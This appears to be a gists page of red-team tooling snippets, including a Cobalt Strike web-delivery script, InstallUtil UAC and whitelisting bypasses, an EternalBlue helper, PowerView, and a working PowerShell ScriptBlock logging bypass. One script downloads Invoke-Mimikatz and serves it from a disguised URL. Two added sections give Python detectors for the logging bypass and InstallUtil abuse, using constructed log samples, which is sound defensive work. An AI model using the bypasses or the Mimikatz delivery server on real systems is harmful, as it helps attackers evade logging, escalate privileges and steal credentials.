This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
```
# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;
```
```csharp
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;

/*
InstallUtil.exe C# version of Event Viewer UAC bypass
```
```powershell
# ScriptBlock Logging Bypass
# @cobbr_io

# Reflect into the private static field where PowerShell caches the Group Policy
# settings it consults before logging a script block. The split strings and the
# backtick in "GetFie`ld" only break up keywords; they do not change behaviour.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    # If the ScriptBlockLogging policy has already been read into the cache,
    # zero both switches in place so later script blocks are not recorded.
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }
}
```
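The bypass above flips the cached Group Policy values that PowerShell consults before writing a script block to Microsoft-Windows-PowerShell/Operational Event ID 4104, so script blocks executed after it are not recorded. The block that performs the bypass is itself compiled, and therefore logged, before the cache changes; the split strings ('ScriptB'+'lockLogging') and the backtick in GetFie`ld exist to defeat keyword matches on that one logged event. The following is an added example written for this page, not part of the gist: it normalizes 4104 ScriptBlockText the way PowerShell would evaluate it (fold literal concatenations, drop keyword-splitting backticks) and then matches indicators specific to this technique. The sample events are constructed, not captured telemetry.

```python
import re

# Constructed sample ScriptBlockText values, shaped like the text field of
# Microsoft-Windows-PowerShell/Operational Event ID 4104. Not real telemetry.
SAMPLE_4104 = [
    # the bypass exactly as written on this page, with its '+' splits and backtick
    "$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')"
    ".\"GetFie`ld\"('cachedGroupPolicySettings', 'N'+'onPublic,Static')",
    "$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0",
    # benign administrative activity that mentions the same policy
    "Get-ChildItem -Path C:\\Windows\\Temp | Where-Object { $_.Length -gt 1MB }",
    "Set-ItemProperty HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging "
    "-Name EnableScriptBlockLogging -Value 1",
]

# PowerShell escape letters: a backtick before one of these is a real escape and
# is left alone; any other backtick (e.g. "GetFie`ld") only splits a keyword.
_ESCAPE_LETTERS = "0abefnrtuv"
_STRAY_BACKTICK = re.compile(r"`(?![" + _ESCAPE_LETTERS + "])")

# 'abc'+'def' or "abc"+'def' -> 'abcdef' (repeated until no '+' joins remain)
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def normalize(script_text):
    """Lower-case, drop keyword-splitting backticks, fold literal concatenations."""
    text = script_text.lower()
    text = _STRAY_BACKTICK.sub("", text)
    while True:
        folded = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", text)
        if folded == text:
            return text
        text = folded


# Indicators specific to this bypass. A plain mention of ScriptBlockLogging is
# deliberately not one; the benign Set-ItemProperty sample must stay quiet.
INDICATORS = {
    "private_gpo_cache_field": re.compile(r"cachedgrouppolicysettings"),
    "reflection_into_automation_utils": re.compile(
        r"system\.management\.automation\.utils.{0,40}getfield"),
    "scriptblocklogging_set_to_zero": re.compile(
        r"enablescriptblock(?:invocation)?logging['\"]?\]?\s*(?:=|,)\s*0\b"),
}


def detect(script_text, deobfuscate=True):
    """Return the names of indicators matching one 4104 ScriptBlockText value."""
    text = normalize(script_text) if deobfuscate else script_text.lower()
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan(events, deobfuscate=True):
    """Return (index, indicators) for every event with at least one hit."""
    hits = []
    for i, text in enumerate(events):
        names = detect(text, deobfuscate)
        if names:
            hits.append((i, names))
    return hits


if __name__ == "__main__":
    for i, names in scan(SAMPLE_4104):
        print(f"event {i}: {', '.join(names)}")
    print("without de-obfuscation:", scan(SAMPLE_4104, deobfuscate=False))
```

Running the same indicators with `deobfuscate=False` shows why the normalization step matters: only the unsplit field name `cachedGroupPolicySettings` survives the string-splitting, and the assignment to zero is missed entirely.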
```powershell
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get  : retrieve full raw data sets
#       Find : 'find' specific data entries in a data set
```
```
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#

# target, listener, where to save .rc file
sub generate_rc_file {
	local('$target $listener $where $handle $shellcode');
	($target, $listener, $where) = @_;
```
```c
typedef interface ICMLuaUtil ICMLuaUtil;

typedef struct ICMLuaUtilVtbl {
    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in ICMLuaUtil * This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void **ppvObject);
```
```ini
; No longer needed - embedded in script now
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
```
```powershell
# fetch Invoke-Mimikatz once and keep it in memory
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")

# minimal HTTP server on port 8080; the http://+:8080/ prefix needs a URL ACL
# (netsh http add urlacl) or an elevated prompt
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    # only the innocuous-looking path serves the script
    If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
        $Buf = [Text.Encoding]::UTF8.GetBytes($mk)
```
```powershell
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)

.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object

.PARAMETER Target
Remote host to pivot to

.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
```
```csharp
/*
Author: Arno0x0x, Twitter: @Arno0x0x

===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs

===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll
*/
```
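Both InstallUtil gists on this page (the Event Viewer UAC bypass above and this installUtil.cs) rely on the same execution path: InstallUtil.exe loads the supplied assembly and, when invoked with /u, calls the Uninstall() method of every class derived from System.Configuration.Install.Installer, so attacker code runs under a Microsoft-signed binary. An empty /logfile= suppresses the .InstallLog file and /logtoconsole=false silences console output, which is exactly what makes the command line the artifact a defender should look at. The following is an added example, not code from either gist: a Python triage over constructed process-creation command lines (the shape of Sysmon Event ID 1 or Security 4688 CommandLine fields) that tokenizes Windows-style quoting, picks out the InstallUtil switches and flags the uninstall-plus-log-suppression combination. All sample lines are constructed for the example.

```python
import ntpath

# Constructed process-creation command lines in the shape of Sysmon Event ID 1 /
# Security 4688 CommandLine fields. Not real telemetry.
SAMPLE_COMMAND_LINES = [
    # the usage line from the installUtil.cs header on this page
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll",
    # same technique, 64-bit runtime, mixed case, dash switches, quoted path
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe" -LogFile= -U "C:\Users\Public\svc.dll"',
    # a legitimate service installation with default logging
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /i "C:\Program Files\Vendor\Service.exe"',
    # unrelated process
    r"C:\Windows\System32\cmd.exe /c whoami",
]


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    tokens, current, in_quotes = [], "", False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if current:
                tokens.append(current)
                current = ""
        else:
            current += ch
    if current:
        tokens.append(current)
    return tokens


def analyze(cmdline):
    """Return None for non-InstallUtil processes, else switches, assemblies and findings."""
    tokens = tokenize(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() != "installutil.exe":
        return None
    switches, assemblies = {}, []
    for tok in tokens[1:]:
        if tok.startswith(("/", "-")):
            # InstallUtil accepts /name=value or -name=value; names are case-insensitive
            name, _, value = tok[1:].partition("=")
            switches[name.lower()] = value
        else:
            assemblies.append(tok)
    findings = []
    if "u" in switches or "uninstall" in switches:
        # /u runs Uninstall() on every Installer subclass in the assembly: the
        # execution path both gists on this page rely on
        findings.append("uninstall_switch")
    if switches.get("logfile") == "":
        # an empty /logfile= stops InstallUtil from writing <assembly>.InstallLog
        findings.append("logfile_suppressed")
    if switches.get("logtoconsole", "").lower() == "false":
        findings.append("console_logging_disabled")
    return {"switches": switches, "assemblies": assemblies, "findings": findings}


def is_suspicious(cmdline):
    """Uninstall path combined with any form of logging suppression."""
    result = analyze(cmdline)
    if result is None:
        return False
    f = result["findings"]
    return "uninstall_switch" in f and ("logfile_suppressed" in f or "console_logging_disabled" in f)


def triage(cmdlines):
    """Indices of command lines that match the InstallUtil uninstall pattern."""
    return [i for i, c in enumerate(cmdlines) if is_suspicious(c)]


if __name__ == "__main__":
    for i in triage(SAMPLE_COMMAND_LINES):
        print(f"suspicious: {SAMPLE_COMMAND_LINES[i]}")
        print(f"  {analyze(SAMPLE_COMMAND_LINES[i])}")
```

The legitimate `/i` installation is kept out of the result on purpose: InstallUtil itself is common on servers, so alerting on the image alone is noisy, while the uninstall switch paired with a suppressed log is the specific shape both gists produce. Matching on the image basename rather than a fixed path also covers the Framework64 and other runtime version directories.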